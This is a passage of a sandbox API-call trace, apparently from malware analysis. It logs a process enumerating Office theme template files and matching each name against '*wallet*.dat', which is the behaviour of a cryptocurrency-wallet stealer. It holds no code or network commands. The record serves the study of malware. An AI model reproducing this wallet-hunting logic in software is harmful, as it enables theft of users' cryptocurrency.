pszSpec="*wallet*.dat") returned 0 [0207.535] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457464[[fn=Dividend]].thmx\\*", lpFindFileData=0x199e90 | out: lpFindFileData=0x199e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98acf19f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98acf19f, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xe42a5200, ftLastWriteTime.dwHighDateTime=0x1d43fbb, nFileSizeHigh=0x0, nFileSizeLow=0x8b615, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="T", cAlternateFileName="J")) returned 0xffffffff [0207.535] FindNextFileA (in: hFindFile=0x5e7708, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9841a2b8, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9841a2b8, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xf2786e00, ftLastWriteTime.dwHighDateTime=0x1d43fbb, nFileSizeHigh=0x0, nFileSizeLow=0x7fb28, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="TM03457475[[fn=Frame]].thmx", cAlternateFileName="TM7844~1.THM")) returned 1 [0207.535] PathMatchSpecA (pszFile="TM03457475[[fn=Frame]].thmx", pszSpec="*wallet*.dat") returned 0 [0207.535] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457475[[fn=Frame]].thmx\\*", lpFindFileData=0x199e90 | out: lpFindFileData=0x199e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9841a2b8, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9841a2b8, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xf2786e00, ftLastWriteTime.dwHighDateTime=0x1d43fbb, nFileSizeHigh=0x0, nFileSizeLow=0x7fb28, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="T", cAlternateFileName="J")) returned 0xffffffff [0207.536] FindNextFileA (in: hFindFile=0x5e7708, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98af6207, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98af6207, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x34091900, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0x2ef7a4, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="TM03457485[[fn=Mesh]].thmx", cAlternateFileName="TM2703~1.THM")) returned 1 [0207.536] PathMatchSpecA (pszFile="TM03457485[[fn=Mesh]].thmx", pszSpec="*wallet*.dat") returned 0 [0207.536] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457485[[fn=Mesh]].thmx\\*", lpFindFileData=0x199e90 | out: lpFindFileData=0x199e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98af6207, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98af6207, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x34091900, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0x2ef7a4, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="T", cAlternateFileName="J")) returned 0xffffffff [0207.536] FindNextFileA (in: hFindFile=0x5e7708, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x987adf7a, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x987adf7a, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xea6cfe00, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0xbddaf, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="TM03457491[[fn=Metropolitan]].thmx", cAlternateFileName="TM5623~1.THM")) returned 1 [0207.536] PathMatchSpecA (pszFile="TM03457491[[fn=Metropolitan]].thmx", pszSpec="*wallet*.dat") returned 0 [0207.536] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457491[[fn=Metropolitan]].thmx\\*", lpFindFileData=0x199e90 | out: lpFindFileData=0x199e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x987adf7a, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x987adf7a, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xea6cfe00, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0xbddaf, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="T", cAlternateFileName="J")) returned 0xffffffff [0207.536] FindNextFileA (in: hFindFile=0x5e7708, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x980694ab, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x980694ab, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80545900, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0xe1c0f, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="TM03457496[[fn=Parallax]].thmx", cAlternateFileName="TM0345~2.THM")) returned 1 [0207.536] PathMatchSpecA (pszFile="TM03457496[[fn=Parallax]].thmx", pszSpec="*wallet*.dat") returned 0 [0207.537] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457496[[fn=Parallax]].thmx\\*", lpFindFileData=0x199e90 | out: lpFindFileData=0x199e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x980694ab, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x980694ab, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80545900, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0xe1c0f, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="T", cAlternateFileName="J")) returned 0xffffffff [0207.537] FindNextFileA (in: hFindFile=0x5e7708, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9818a945, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9818a945, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xba712b00, ftLastWriteTime.dwHighDateTime=0x1d43fbb, nFileSizeHigh=0x0, nFileSizeLow=0xec122, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="TM03457503[[fn=Quotable]].thmx", cAlternateFileName="TM0345~4.THM")) returned 1 [0207.537] PathMatchSpecA (pszFile="TM03457503[[fn=Quotable]].thmx", pszSpec="*wallet*.dat") returned 0 [0207.537] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457503[[fn=Quotable]].thmx\\*", lpFindFileData=0x199e90 | out: lpFindFileData=0x199e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9818a945, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9818a945, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xba712b00, ftLastWriteTime.dwHighDateTime=0x1d43fbb, nFileSizeHigh=0x0, nFileSizeLow=0xec122, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="T", cAlternateFileName="J")) returned 0xffffffff [0207.537] FindNextFileA (in: hFindFile=0x5e7708, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97fbbf10, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x97fbbf10, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc65ced00, ftLastWriteTime.dwHighDateTime=0x1d43fbb, nFileSizeHigh=0x0, nFileSizeLow=0x125f51, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="TM03457510[[fn=Savon]].thmx", cAlternateFileName="TM0345~1.THM")) returned 1 [0207.537] PathMatchSpecA (pszFile="TM03457510[[fn=Savon]].thmx", pszSpec="*wallet*.dat") returned 0 [0207.537] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457510[[fn=Savon]].thmx\\*", lpFindFileData=0x199e90 | out: lpFindFileData=0x199e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97fbbf10, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x97fbbf10, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc65ced00, ftLastWriteTime.dwHighDateTime=0x1d43fbb, nFileSizeHigh=0x0, nFileSizeLow=0x125f51, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="T", cAlternateFileName="J")) returned 0xffffffff [0207.537] FindNextFileA (in: hFindFile=0x5e7708, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x980b633e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x980b633e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80545900, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0x76cc4, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="TM03457515[[fn=View]].thmx", cAlternateFileName="TM0345~3.THM")) returned 1 [0207.537] PathMatchSpecA (pszFile="TM03457515[[fn=View]].thmx", pszSpec="*wallet*.dat") returned 0 [0207.537] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457515[[fn=View]].thmx\\*", lpFindFileData=0x199e90 | out: lpFindFileData=0x199e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x980b633e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x980b633e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80545900, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0x76cc4, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="T", cAlternateFileName="J")) returned 0xffffffff [0207.538] FindNextFileA (in: hFindFile=0x5e7708, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x978145cc, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x978145cc, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc65ced00, ftLastWriteTime.dwHighDateTime=0x1d43fbb, nFileSizeHigh=0x0, nFileSizeLow=0xee481, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="TM04033917[[fn=Berlin]].thmx", cAlternateFileName="TM0403~1.THM")) returned 1 [0207.538] PathMatchSpecA (pszFile="TM04033917[[fn=Berlin]].thmx", pszSpec="*wallet*.dat") returned 0 [0207.538] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033917[[fn=Berlin]].thmx\\*", lpFindFileData=0x199e90 | out: lpFindFileData=0x199e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x978145cc, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x978145cc, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc65ced00, ftLastWriteTime.dwHighDateTime=0x1d43fbb, nFileSizeHigh=0x0, nFileSizeLow=0xee481, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="T", cAlternateFileName="J")) returned 0xffffffff [0207.538] FindNextFileA (in: hFindFile=0x5e7708, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x984c4fd2, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x984c4fd2, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xdd034400, ftLastWriteTime.dwHighDateTime=0x1d43fbb, nFileSizeHigh=0x0, nFileSizeLow=0x165552, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="TM04033919[[fn=Circuit]].thmx", cAlternateFileName="TMFEFA~1.THM")) returned 1 [0207.538] PathMatchSpecA (pszFile="TM04033919[[fn=Circuit]].thmx", pszSpec="*wallet*.dat") returned 0 [0207.538] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033919[[fn=Circuit]].thmx\\*", lpFindFileData=0x199e90 | out: lpFindFileData=0x199e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x984c4fd2, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x984c4fd2, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xdd034400, ftLastWriteTime.dwHighDateTime=0x1d43fbb, nFileSizeHigh=0x0, nFileSizeLow=0x165552, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="T", cAlternateFileName="J")) returned 0xffffffff [0207.538] FindNextFileA (in: hFindFile=0x5e7708, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x982f049f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x982f049f, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5c911300, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0x21dbbf, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="TM04033921[[fn=Damask]].thmx", cAlternateFileName="TM0403~4.THM")) returned 1 [0207.539] PathMatchSpecA (pszFile="TM04033921[[fn=Damask]].thmx", pszSpec="*wallet*.dat") returned 0 [0207.539] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033921[[fn=Damask]].thmx\\*", lpFindFileData=0x199e90 | out: lpFindFileData=0x199e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x982f049f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x982f049f, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5c911300, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0x21dbbf, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="T", cAlternateFileName="J")) returned 0xffffffff [0207.539] FindNextFileA (in: hFindFile=0x5e7708, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98ab2749, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98ab2749, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc68a00, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0x1ab70b, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="TM04033925[[fn=Droplet]].thmx", cAlternateFileName="TM9F98~1.THM")) returned 1 [0207.539] PathMatchSpecA (pszFile="TM04033925[[fn=Droplet]].thmx", pszSpec="*wallet*.dat") returned 0 [0207.539] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033925[[fn=Droplet]].thmx\\*", lpFindFileData=0x199e90 | out: lpFindFileData=0x199e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98ab2749, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98ab2749, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc68a00, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0x1ab70b, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="T", cAlternateFileName="J")) returned 0xffffffff [0207.539] FindNextFileA (in: hFindFile=0x5e7708, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x981588c3, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x981588c3, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x2358a300, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0x2c9ecd, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="TM04033927[[fn=Main Event]].thmx", cAlternateFileName="TM0403~3.THM")) returned 1 [0207.539] PathMatchSpecA (pszFile="TM04033927[[fn=Main Event]].thmx", pszSpec="*wallet*.dat") returned 0 [0207.539] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033927[[fn=Main Event]].thmx\\*", lpFindFileData=0x199e90 | out: lpFindFileData=0x199e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x981588c3, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x981588c3, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x2358a300, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0x2c9ecd, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="T", cAlternateFileName="J")) returned 0xffffffff [0207.539] FindNextFileA (in: hFindFile=0x5e7708, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9852435b, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9852435b, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9cf09100, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0x23f73b, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="TM04033929[[fn=Slate]].thmx", cAlternateFileName="TMA957~1.THM")) returned 1 [0207.539] PathMatchSpecA (pszFile="TM04033929[[fn=Slate]].thmx", pszSpec="*wallet*.dat") returned 0 [0207.539] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033929[[fn=Slate]].thmx\\*", lpFindFileData=0x199e90 | out: lpFindFileData=0x199e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9852435b, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9852435b, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9cf09100, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0x23f73b, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="T", cAlternateFileName="J")) returned 0xffffffff [0207.540] FindNextFileA (in: hFindFile=0x5e7708, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9800b4e9, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9800b4e9, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x4f742400, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0x371abc, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="TM04033937[[fn=Vapor Trail]].thmx", cAlternateFileName="TM0403~2.THM")) returned 1 [0207.540] PathMatchSpecA (pszFile="TM04033937[[fn=Vapor Trail]].thmx", pszSpec="*wallet*.dat") returned 0 [0207.540] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033937[[fn=Vapor Trail]].thmx\\*", lpFindFileData=0x199e90 | out: lpFindFileData=0x199e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9800b4e9, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9800b4e9, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x4f742400, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0x371abc, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="T", cAlternateFileName="J")) returned 0xffffffff [0207.540] FindNextFileA (in: hFindFile=0x5e7708, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98742454, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98742454, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x973bdf00, ftLastWriteTime.dwHighDateTime=0x1d4196d, nFileSizeHigh=0x0, nFileSizeLow=0x10a79d, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="TM10001114[[fn=Gallery]].thmx", cAlternateFileName="TM1000~2.THM")) returned 1 [0207.540] PathMatchSpecA (pszFile="TM10001114[[fn=Gallery]].thmx", pszSpec="*wallet*.dat") returned 0 [0207.540] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001114[[fn=Gallery]].thmx\\*", lpFindFileData=0x199e90 | out: lpFindFileData=0x199e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98742454, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98742454, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x973bdf00, ftLastWriteTime.dwHighDateTime=0x1d4196d, nFileSizeHigh=0x0, nFileSizeLow=0x10a79d, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="T", cAlternateFileName="J")) returned 0xffffffff [0207.540] FindNextFileA (in: hFindFile=0x5e7708, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9860260f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9860260f, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x235700, ftLastWriteTime.dwHighDateTime=0x1d4196e, nFileSizeHigh=0x0, nFileSizeLow=0x9477a, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="TM10001115[[fn=Parcel]].thmx", cAlternateFileName="TM1000~1.THM")) returned 1 [0207.540] PathMatchSpecA (pszFile="TM10001115[[fn=Parcel]].thmx", pszSpec="*wallet*.dat") returned 0 [0207.540] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001115[[fn=Parcel]].thmx\\*", lpFindFileData=0x199e90 | out: lpFindFileData=0x199e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9860260f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9860260f, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x235700, ftLastWriteTime.dwHighDateTime=0x1d4196e, nFileSizeHigh=0x0, nFileSizeLow=0x9477a, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="T", cAlternateFileName="J")) returned 0xffffffff [0207.540] FindNextFileA (in: hFindFile=0x5e7708, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9860260f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9860260f, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x235700, ftLastWriteTime.dwHighDateTime=0x1d4196e, nFileSizeHigh=0x0, nFileSizeLow=0x9477a, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="TM10001115[[fn=Parcel]].thmx", cAlternateFileName="TM1000~1.THM")) returned 0 [0207.540] FindClose (in: hFindFile=0x5e7708 | out: hFindFile=0x5e7708) returned 1 [0207.542] FindNextFileA (in: hFindFile=0x5e7e88, lpFindFileData=0x19aba0 | out: lpFindFileData=0x19aba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98c54758, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98c54758, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="1033", cAlternateFileName="")) returned 0 [0207.542] FindClose (in: hFindFile=0x5e7e88 | out: hFindFile=0x5e7e88) returned 1 [0207.542] FindNextFileA (in: hFindFile=0x5e7e08, lpFindFileData=0x19b228 | out: lpFindFileData=0x19b228*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d88102, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d88102, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d88102, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="SmartArt Graphics", cAlternateFileName="SMARTA~1")) returned 1 [0207.542] PathMatchSpecA (pszFile="SmartArt Graphics", pszSpec="*wallet*.dat") returned 0 [0207.542] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\*", lpFindFileData=0x19aba0 | out: lpFindFileData=0x19aba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d88102, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d88102, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d88102, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19a218, dwReserved1=0x1, cFileName=".", cAlternateFileName="")) returned 0x5e7e88 [0207.543] FindNextFileA (in: hFindFile=0x5e7e88, lpFindFileData=0x19aba0 | out: lpFindFileData=0x19aba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d88102, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d88102, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d88102, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="..", cAlternateFileName="")) returned 1 [0207.543] FindNextFileA (in: hFindFile=0x5e7e88, 